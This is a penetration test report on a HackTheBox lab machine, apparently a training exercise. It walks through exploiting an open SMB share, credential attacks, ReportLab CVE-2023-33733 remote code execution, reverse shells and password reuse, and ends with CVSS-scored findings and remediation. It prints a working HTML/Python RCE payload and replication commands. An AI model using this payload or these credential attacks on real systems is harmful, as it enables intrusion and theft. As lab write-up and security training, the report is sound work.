penetration-testing-report

Prepared for: HackTheBox Prepared by: Downscope Security Solutions Date: 27 May 2024 # Executive Summary #### Overview Downscope Security Solutions conducted an internal network penetration test for HackTheBox on May 21st, 2024 from 09:00 to 17:00 CST. The test was conducted to evaluate the security posture of HackTheBox's systems within the provided scope. #### Objectives 1. Identify security vulnerabilities in HackTheBox's systems. 2. Exploit discovered vulnerabilities to assess their potential impact. 3. Provide remediation recommendations to enhance HackTheBox's security posture. 4. Retrieve the following proprietary files from HackTheBox's network: - `user.txt` - `root.txt` #### Key Findings Downscope Security Solutions identified several critical and high-severity vulnerabilities during the penetration test. The key findings are: 1. **Exposure of sensitive information via SMB share** - **Description**: An SMB share that required no username or password to access was discovered, exposing personal identifiable information (PII) such as Social Security numbers, account numbers, usernames, emails, passwords, and security questions/answers. - **Impact**: Unauthorized access to user accounts, identify theft, and financial fraud. 2. **Remote code execution on ReportHub web application** - **Description**: The "training request" page on the ReportHub web application has a remote code execution vulnerability due to an outdated third-party dependency (ReportLab). - **Impact**: Potential for complete system compromise and loss in data confidentiality, integrity, and availability. 3. **Password reuse** - **Description**: Several users were found to reuse passwords across different accounts, leading to multiple instances of privilege escalation and account takeover. - **Impact**: This could allow an attacker to conduct credential stuffing attacks, potentially resulting in unauthorized access to several accounts and systems. 4. **Plaintext Credentials Stored in ReportHub's Database** - **Description**: The ReportHub software stored passwords in plaintext, making them trivially accessible upon a compromise of the database. - **Impact**: Similar to the password reuse finding, the impact is the same. Because credentials are stored in an insecure format, there is no confidentiality. The discovered vulnerabilities could result in significant compromises of data confidentiality, integrity, and availability if exploited by a threat actor. A breach in security as a result of these vulnerabilities could result in financial losses, lawsuits, and loss of public trust. #### Recommendations: To mitigate the discovered vulnerabilities and enhance the security posture of HackTheBox, Downscope Security Solutions recommends the following course of action: - **Secure SMB shares**: Implement access control on SMB shares using the principle of least privilege. If PII must be kept on shares, consider storing it in an encrypted manner. - **Patch vulnerable software**: Update ReportLab to its latest version. - **Enforce strong password policies**: Require users to have unique passwords for different accounts. Consider requiring the use of a password manager to generate and store strong passwords. - **Utilize password hashing in ReportHub's database**: Modify the ReportHub application to store passwords in a hashed format. - **Conduct regular security audits**: Perform regular security audits to ensure new vulnerabilities and misconfigurations are discovered and remediated. By implementing the recommended security measures, HackTheBox will greatly enhance its security posture and minimize the risk of future cyber attacks. #### Scope The assessment was conducted remotely using a OpenVPN connection within a Downscope Security Solutions lab, headquartered in Lee's Summit, Missouri. Personnel Involved in the Project | Name | Company | Role | Email | Phone | | --------------- | ---------------------------- | ----------------------------------------------------- | -------------------- | ------------------ | | Haris Pylarinos | HackTheBox | CEO, authorized signatory, secondary point of contact | [email protected] | +44 (777) 240-1923 | | James Hooker | HackTheBox | CTO, project lead, primary point of contact | [email protected] | +44 (777) 240-4200 | | Jake Saunders | Downscope Security Solutions | Security consultant | [email protected] | +1 (816) 524-1337 | ### Network Scope The following list of IP address ranges was provided: * **10.10.11.16/32** The testing conditions requested by HackTheBox were as follows: - Testing of systems be conducted during the specified outage window (09:00 CST - 17:00 CST). - No Distributed Denial of Service (DDoS) or Denial of Service (DoS) attacks are to be executed. The assessment was conducted from Downscope Security Solution's computer systems, which were assigned the following IP addresses. All machines ran a virtualized Kali Linux build: * **10.10.14.10** * **10.10.14.5** * **10.10.14.61** * **10.10.14.11** --- # Attack Narrative The assessment began the morning of May 21st, 2024 at 09:00 CST with the tester establishing a connection to HackTheBox's local area network via OpenVPN. The tester started with a `nmap` port scan to see which ports and services were open on the host: ```bash nmap 10.10.11.16 -sVC -p- --min-rate=2000 -oA nmap/all_ports.txt ``` ![[images/Pasted image 20240531004705.png]] Seeing the redirect to the URL with a subdomain, the `solarlab.htb` and `report.solarlab.htb` virtual hosts were added to the tester's hosts file: ```bash (keep this?) echo '10.10.11.16 solarlab.htb report.solarlab.htb' >> /etc/hosts ``` The tester visited the web server on port 80, which appeared to just be a static site. The web server on port 6791 revealed a login page. The assessor tried several combinations of common usernames and passwords with no success. With no known credentials, the tester moved on. ![[images/Pasted image 20240519141945.png]] Enumerating port 445 (SMB) revealed a readable share called `Documents`. The tester connected to the share with `smbclient` and downloaded all readable files. ```bash smbclient -N -L \\\\solarlab.htb\\ smbclient -N \\\\solarlab.htb\\Documents recurse ON prompt OFF mget * ``` ![[images/Pasted image 20240516142315.png]] After analyzing the documents, the tester was able to discover the following for Claudia S, Blake Byte, and Alexander Knight in the `details-file.xlsx` file: Social Security numbers, account numbers, usernames, emails, passwords, and security questions/answers. *Note: some of these credentials were used in a later attack to gain remote code execution on the `solarlab.htb` machine.* Next, the tester sprayed the newly discovered usernames and passwords against the `solarlab.htb` machine using the `netexec smb` module, but was unable to find any valid credentials. While reviewing the ReportHub login page on port 6791, the tester utilized a `burpsuite` cluster bomb attack to test all permutations of the discovered usernames and passwords. The username and passwords from the `details-file.xlsx` file were used to generate the following wordlists for the attack: `users` ``` [email protected] KAlexander [email protected] blake.byte AlexanderK ClaudiaS ``` `passwords` ``` [REDACTED FOR SECURITY REASONS] ``` ![[images/Pasted image 20240519143526.png]] The attack failed to find any valid credentials. After further analyzing the discovered usernames/passwords, the tester noticed a naming scheme for the usernames, and made some modifications to the `users` file: `users` ``` Alexander.knight KAlexander blake.byte AlexanderK SClaudia ClaudiaS BlakeB BBlake ``` The tester ran the attack again and found a valid password for the `BlakeB` user. After logging into the ReportHub website, the following options were presented: ![[images/Pasted image 20240519144559.png]] A page with PDF generation capabilities was discovered on the "Training Request" endpoint: ![[images/Pasted image 20240519145717.png]] The tester then generated a sample training request and discovered the report was created using a software called "ReportLab": ![[images/Pasted image 20240520170514.png]] ReportLab (up to v3.6.12) is [vulnerable to remote code execution](https://github.com/c53elyas/CVE-2023-33733) via the injection of malicious HTML code into a PDF creation request. The vulnerability can be exploited using the following HTML code: ```html <para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('whoami') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'"> exploit </font></para> ``` After confirming code execution, the assessor replaced the `whoami` payload with a base64 encoded PowerShell reverse shell. Then, a new PDF file was created with the modified payload in the "training type" field of the website's "training request" form: ![[images/Pasted image 20240520184954.png]] The tester set a `netcat` listener on port 1337, submitted the malicious request to the training request endpoint, and subsequently received a callback: ![[images/Pasted image 20240520184829.png]] This level of access allowed us to achieve the first objective: *read the `user.txt` file from the 10.10.11.16 machine*: ![[images/Pasted image 20240526171742.png]] The tester began to enumerate the blake account to find potential privilege escalation vectors. Eventually, a database was discovered in blake's app folder: ![[images/Pasted image 20240530232322.png]] The tester used the `net user` command to gather all the users on the machine, put the discovered passwords into a password list, and conducted a password spray with `netexec` to check for password reuse: ![[images/Pasted image 20240530232447.png]] The `Administrator` account finding in the above screenshot was a false positive, but the valid credentials for `openfire` allowed for lateral movement. A reverse shell was opened as the `openfire` user using `RunasCS`: ![[images/Pasted image 20240530232523.png]] This new level of access allowed the tester to decrypt the Openfire program's password using the `passwordKey` and `encrypted password` from the `C:\Program Files\Openfire\openfire.script` file. The tester compiled and ran a decryption tool from [this](https://github.com/c0rdis/openfire_decrypt) GitHub repository: ```bash javac OpenFireDecryptPass.java java OpenFireDecryptPass becb...[REDACTED] hGX...[REDACTED] ``` Conveniently, the administrator reused the Openfire password with their Windows account, and vertical privilege escalation was achieved by opening a reverse shell as the `Administrator` account using `RunasCs`: ![[images/Pasted image 20240526171112.png]] This allowed the tester to complete the second objective of the test: *reading the `root.txt` from the 10.10.11.16 machine*: ![[images/Pasted image 20240526171537.png]] With the final objective successfully achieved, the assessment concluded May 21st at 15:37 CST. --- # Vulnerabilities ### 1: Exposure of Sensitive information via SMB Share ##### Description: An SMB share was discovered to be accessible without any authentication (null authentication). The share contained a file named `details-file.xlsx` that contained sensitive PII for several users, including Social Security numbers, account numbers, usernames, emails, passwords, security questions/answers. ##### Impact: CRITICAL(9.3/10) `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)` The presence of personal identifiable information (PII) on an SMB share that allows null authentication can have major consequences, including unauthorized access, data exfiltration, identity theft, and financial fraud. ##### Replication Steps: 1. Connect to the SMB share with a tool like `smbclient` and download the file with sensitive information: ```bash smbclient -N \\\\solarlab.htb\\Documents get details-file.xlsx ``` 2. Open the `details-file.xlsx` file and view the sensitive information. ##### Remediation: 1. **Restrict access to SMB share**: Implement access controls on the SMB shares using the principle of least privilege to ensure only necessary users are able to access the share. 2. **Safely store sensitive information**: Require users to store passwords for their accounts in a password manager. If a user's Social Security number must be stored on their computer, the file should be encrypted. 3. **Conduct regular audits**: Schedule security audits that include reviews of SMB shares to find and remediate any misconfigured permissions or storage of sensitive data. ##### References: | Name | Description | | ------------------------------------------------------------------------ | ---------------------------------------------------------- | | MITRE ATT&CK [T1135](https://attack.mitre.org/techniques/T1135/) | Network Share Discovery | | MITRE ATT&CK [T1552.001](https://attack.mitre.org/techniques/T1552/001/) | Unsecured Credentials: Credentials In Files | | [CWE-200](https://cwe.mitre.org/data/definitions/200.html) | Exposure of Sensitive Information to an Unauthorized Actor | --- ### 2: Authenticated Remote Code Execution on ReportHub Web Application ##### Description: The ReportHub website suffers from a vulnerability in its PDF generation functionality. It utilizes a version of ReportLab that is vulnerable to remote code execution via injecting malicious HTML code into a PDF generation request. ##### Impact: HIGH (8.8/10) `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` Exploiting this vulnerability allows an attacker to run arbitrary code on the `solarlab.htb` machine, leading to potential compromise of confidentiality, integrity, and availability of the system and its data. ##### Replication Steps: 1. Access the ReportHub website and navigate to the "training request" endpoint. 2. Insert the malicious HTML payload into the "training type" field of the training request form: ```html <para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('enter powershell/batch payload here') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'"> exploit </font></para> ``` 3. Start a `netcat` listener and submit the malicious request to the training request endpoint. ##### Remediation: 1. **Patch software**: Update ReportLab to its most recent version. 2. **Input validation**: Require all input going into the PDF generation process be sanitized. 3. **Account privilege separation**: Create an account used only for running the ReportHub service to minimize the impact of a potential compromise. ##### References: | Name | Description | | ------------------------------------------------------------------------ | --------------------------------------------------------- | | [CWE-94](https://cwe.mitre.org/data/definitions/94.html) | Improper Control of Generation of Code ('Code Injection') | | [CWE-1395](https://cwe.mitre.org/data/definitions/1395.html) | Dependency on Vulnerable Third-Party Component | | MITRE ATT&CK [T1059.006](https://attack.mitre.org/techniques/T1059/006/) | Command and Scripting Interpreter: Python | | [CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) | Information on ReportLab RCE | --- ### 3: Weak Credentials(Password Reuse) ##### Description: During the assessment, the tester discovered several users were reusing credentials across accounts. This allowed for several instances of privilege escalation and account takeover. ##### Impact: HIGH (8.6/10) `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N` Password reuse can lead to the compromise of user accounts if a single password is used across multiple accounts. This practice can result in an attacker gaining unauthorized access to other systems and accounts. ##### Replication Steps: 1. Obtain valid credentials from one system (e.g., through an SMB share or other means). 2. Attempt to use the same credentials to log in to other systems, services, or accounts. ##### Remediation: 1. **Enforce password policies**: Implement password policies that require unique passwords across users' accounts. 2. **Use a password manager**: Require users to store and generate strong passwords in a password manager, making it easier to store and track multiple unique passwords. 3. **MFA**: As a secondary security control, consider utilizing multi-factor authentication. If a weak credential was guessed or stolen, this security measure would prevent unauthorized access. ##### References: | Name | Description | | --------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------- | | MITRE ATT&CK [T1078](https://attack.mitre.org/techniques/T1078/) | Valid Accounts | | [CWE-1391](https://cwe.mitre.org/data/definitions/1391.html) | Use of Weak Credentials | | [Create and use strong passwords](https://support.microsoft.com/en-us/windows/create-and-use-strong-passwords-c5cebb49-8c53-4f5e-2bc4-fe357ca048eb) | Microsoft article to assist in the development of a password policy | --- ### 4: Plaintext Credentials Stored in ReportLab's Database ##### Description: The ReportLab software stores its usernames and passwords in plaintext within its database file. During the assessment, it was discovered that these credentials were easily accessible on a compromised machine. ##### Impact: HIGH (7.8/10) `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` Having plaintext credentials stored in an application's database can result in attackers obtaining unauthorized access to user accounts. This discovery allowed the tester to obtain valid usernames and passwords, which facilitated further access to systems and accounts. ##### Replication Steps: 2. View ReportLab's user database: ```powershell type C:\Users\blake\Documents\app\instance\users.db ``` ##### References: 1. **Hash passwords**: Modify the ReportLab instance to store passwords in a hashed format. Utilize a cryptographically secure hashing algorithm that utilizes salting, like Bcrypt or Argon2. ##### Resources: | Name | Description | | ------------------------------------------------------------------------ | ------------------------------------------- | | MITRE ATT&CK [T1552.001](https://attack.mitre.org/techniques/T1552/001/) | Unsecured Credentials: Credentials In Files | | [CWE-313](https://cwe.mitre.org/data/definitions/313.html) | Cleartext Storage in a File or on Disk |